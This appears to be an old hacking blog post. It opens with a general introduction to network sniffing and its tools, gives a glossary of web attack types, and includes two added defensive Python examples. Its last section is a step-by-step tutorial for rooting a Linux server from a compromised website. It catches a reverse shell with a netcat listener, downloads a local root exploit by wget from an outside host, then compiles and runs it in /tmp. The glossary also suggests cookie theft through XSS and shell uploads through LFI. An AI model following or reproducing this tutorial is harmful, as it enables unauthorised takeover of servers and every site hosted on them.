
Network Sniffing- An Introduction

Do you think you are safe because you use a smart antivirus tool to protect your computer from backdoors such as remote administration tools or keyloggers? Antivirus and a firewall are good to have, but you must also consider sniffing as a security issue. There are many sniffing tools available for various operating systems, including Windows and Linux; we will talk about the tools later, but first sniffing itself needs to be described.


Network sniffing tools and packet analysers are generally the same thing. The main purpose of sniffing is to analyse incoming and outgoing packets. Keep in mind that when you connect to a web server, or to any other computer on a network, your data is sent over the wired or wireless connection in the form of packets.



A packet contains the source (sender) and destination (receiver) IP and MAC addresses, and it also contains the data being sent. So imagine that someone else gets hold of this packet: he or she can easily see what you have sent, and an attacker can sniff your confidential information (credit card numbers, PayPal details, passwords and so on). Sniffing is therefore an important attack that must be taken into account when planning security measures.




Large organisations and web servers use a secure connection for transmission; for example, PayPal uses https:// instead of http://, which means your data travels in encrypted form. Using SSL does not mean you are secure forever, though: there are ways to crack the secure channel.



Everything discussed above makes sniffing look like a bad thing, but that is not the whole truth: the positive usage of a sniffer is also its regular usage, whose aim is to keep the network and systems working normally:

  • Capturing packets
  • Recording and analysing traffic
  • Decrypting packets and displaying in clear text
  • Converting data to readable format
  • Showing relevant information like IP, protocol, host or server name and so on.
While the negative usage is open and clear:
  • Catching passwords, which is the main reason for most illegal uses of sniffing tools
  • Capturing special and private transaction details, such as usernames, credit card IDs, account numbers and passwords
  • Recording email or instant messages and reading their content
The most famous and widely used tools for sniffing purposes are:
  • Wireshark (discussed later)
  • Kismet (for wireless sniffing, discussed later)
  • NetStumbler (for wireless sniffing, discussed later)
  • KisMAC (for wireless sniffing, discussed later)
  • Ettercap (discussed later)
  • Tcpdump (discussed later)
  • Cain and Abel (discussed later)
  • and others
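To make concrete what a sniffer actually sees in a captured packet (the MAC and IP addresses and the data the post describes, and why https:// hides only the content), here is an added example, not code from the original post. It builds a constructed Ethernet/IPv4/TCP frame (no real capture, checksums left at zero) and decodes it the way a packet analyser would; the addresses and the login form are made-up sample values.

```python
import struct
from typing import Any, Dict

def build_frame(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Constructed Ethernet II / IPv4 / TCP frame (checksums left at zero) used as sample input."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"  # dst MAC, src MAC, IPv4
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")), bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp

def parse_frame(frame: bytes) -> Dict[str, Any]:
    """Decode the fields a sniffer shows: MAC addresses, IP addresses, ports and payload."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    info: Dict[str, Any] = {
        "src_mac": ":".join(f"{b:02x}" for b in src_mac),
        "dst_mac": ":".join(f"{b:02x}" for b in dst_mac),
    }
    if ethertype != 0x0800:
        info["protocol"] = f"non-IPv4 ethertype 0x{ethertype:04x}"
        return info
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4            # IPv4 header length in bytes
    info["src_ip"] = ".".join(str(b) for b in ip[12:16])
    info["dst_ip"] = ".".join(str(b) for b in ip[16:20])
    if ip[9] != 6:                      # protocol field: 6 is TCP
        info["protocol"] = f"IP protocol {ip[9]}"
        return info
    tcp = ip[ihl:]
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    payload = tcp[(tcp[12] >> 4) * 4:]  # skip the TCP header (data offset is in 32-bit words)
    info.update(protocol="TCP", src_port=src_port, dst_port=dst_port)
    if 80 in (src_port, dst_port):
        # Plain HTTP: everything, including form fields carrying passwords, is readable as sent.
        info["payload"] = payload.decode("ascii", errors="replace")
    else:
        # TLS on 443: the sniffer still sees addresses and sizes, but the content is opaque.
        info["payload"] = f"<{len(payload)} opaque bytes>"
    return info

if __name__ == "__main__":
    login = b"POST /login HTTP/1.1\r\nHost: example.test\r\n\r\nuser=alice&pass=hunter2"
    print(parse_frame(build_frame("192.168.1.10", "203.0.113.5", 51000, 80, login)))
    print(parse_frame(build_frame("192.168.1.10", "203.0.113.5", 51001, 443, b"\x16\x03\x01\x00\x05hello")))
```

The second frame stands in for an HTTPS record: the same sniffer still learns who is talking to whom and how much, which is why the post's point that SSL is not a complete answer holds even when the content itself is unreadable.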

Types Of Hacking

SQLi - SQL Injection: allows an attacker to manipulate queries and pull important data, such as logins, out of the database.
BSQLi - Blind SQL Injection: harder than normal SQL injection and requires much more time.
XSS - Cross-site scripting: allows you to run CSS scripts on websites. Can be useful for stealing cookies.
LFI - Local File Inclusion: allows including a local page. Can be exploited to upload a shell. Sometimes filtered, but the filter can be bypassed using null byte injection.
RFI - Remote File Inclusion: allows including a page from a remote host. The server usually parses the included code as .php and executes it.
SSI - Server Side Includes: similar to code execution. Affected extensions: .shtm, .shtml and more.
RCE - Remote command/code execution: allows executing code on the remote host.

Server Rooting Tutorial

I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:

- A shelled website.
- NetCat installed on your computer.
- Patience.
- Port 443, or any other port except 80, opened on your router.

Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/sh or backconnect. Type in your IP and the port you want the server to connect to (it must be opened on your router). Do not press backconnect yet. Download NetCat here:


www.downloadnetcat.com


Extract the files to a folder on your desktop. Now go to Run > cmd to open a command prompt, and type:


cd <path>


Replace <path> with the path to the netcat folder. Okay, now type:


nc -lnvp <port>


Replace <port> with the port you opened and used on the shell.


Now it should display something like this:


Listening on port [any] ...


Minimize this window and go back to the web shell. Type in your IP address and port and click backconnect. If you did everything right, the server does not have a firewall and your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23: you have control over your website only, but not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is the 2.6.18 2008 version... Hmm, that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, which is always writeable.


Type this:


cd /tmp


Now let's make a folder for the exploit.


mkdir exploit


cd into this folder.


cd exploit


Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:


wget http://goodbye.fileave.com/localroot.c


Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:


gcc localroot.c -o h00lyshit


Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:


dd if=/dev/urandom of=largefile count=2M


This will create a large file, where largefile is its name. This can take up to 5 minutes. Once it is ready, chmod h00lyshit and largefile to 777:


chmod 777 h00lyshit

chmod 777 largefile

Now let's run the exploit! Type this:


./h00lyshit largefile


Now wait for about 3 minutes. If the kernel is not patched and it is the right version, you are root! Type 'id' and you will see:


uid=0(root)


You have successfully gained root!
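The walkthrough above depends on two things the server's administrator controls: a world-writable /tmp where a downloaded source file can be compiled and run, and a kernel old enough to have a public local root exploit. As an added example (not part of the original post), here is a small audit that parses text in /proc/mounts format and reports which scratch directories lack the noexec, nosuid and nodev options that block the "compile it in /tmp and run it" step; the required option set and the sample mount table are constructed for this example.

```python
from typing import Dict, Set

# Options that stop world-writable scratch directories being used to run freshly built binaries
# (assumed hardening policy for this example).
REQUIRED = {"noexec", "nosuid", "nodev"}

def parse_mounts(text: str) -> Dict[str, Set[str]]:
    """Map mount point -> set of mount options, from text in /proc/mounts format."""
    mounts: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        _device, mountpoint, _fstype, opts = parts[:4]
        mounts[mountpoint] = set(opts.split(","))
    return mounts

def audit_scratch_dirs(text: str, dirs=("/tmp", "/var/tmp", "/dev/shm")) -> Dict[str, str]:
    """Report, per scratch directory, which hardening options are missing."""
    mounts = parse_mounts(text)
    report: Dict[str, str] = {}
    for d in dirs:
        if d not in mounts:
            # No separate mount: the directory inherits the root filesystem's options,
            # so anything compiled there can be executed.
            report[d] = "not a separate mount"
        else:
            missing = REQUIRED - mounts[d]
            report[d] = "ok" if not missing else "missing " + ",".join(sorted(missing))
    return report

# Constructed /proc/mounts sample: /tmp lacks noexec and /var/tmp is not its own mount.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
"""

if __name__ == "__main__":
    for path, status in audit_scratch_dirs(SAMPLE_MOUNTS).items():
        print(f"{path}: {status}")
```

On a live system the same function can be fed the contents of /proc/mounts; mount options are one layer only, and the decisive fix for the attack described is keeping the kernel patched so the local root exploit has nothing to hit.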
